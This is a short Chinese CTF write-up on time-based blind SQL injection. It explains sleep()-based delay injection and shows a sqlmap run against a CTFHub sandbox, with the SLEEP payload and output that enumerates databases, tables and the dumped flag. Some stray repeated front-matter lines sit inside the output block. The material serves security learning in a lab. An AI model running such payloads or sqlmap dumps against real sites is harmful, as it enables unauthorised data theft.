web渗透时间盲注
薛谔时间盲注
时间盲注简介
时间盲注又称延迟注入,个人理解,适用于==页面不会返回错误信息,只会回显一种界面==,其主要特征是==利用sleep函数,制造时间延迟,由回显时间来判断是否报错==。
官方理解:利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。
1
| sqlmap -u "http://challenge-1715702b3e026ca9.sandbox.ctfhub.com:10800/?id=1"
|
1
2
3
4
5
6
7
8
9
10
11
12
13
| ---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 9203 FROM (SELECT(SLEEP(5)))WNiH)
tags: [web渗透]
title: 时间盲注
title: 时间盲注
title: 时间盲注
tags: [web渗透]
title: 时间盲注
tags: [web渗透]
---
|
1
2
3
4
5
| available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sqli
|
1
2
3
4
5
6
7
| Database: sqli
[2 tables]
+------+
| flag |
| news |
+------+
|
1
2
3
4
5
6
7
8
| Database: sqli
Table: flag
[1 column]
+--------+--------------+
| Column | Type |
+--------+--------------+
| flag | varchar(100) |
+--------+--------------+
|
1
2
3
4
5
6
7
8
| Database: sqli
Table: flag
[1 entry]
+----------------------------------+
| flag |
+----------------------------------+
| ctfhub{db50ceb57b14564b0aba5db0} |
+----------------------------------+
|
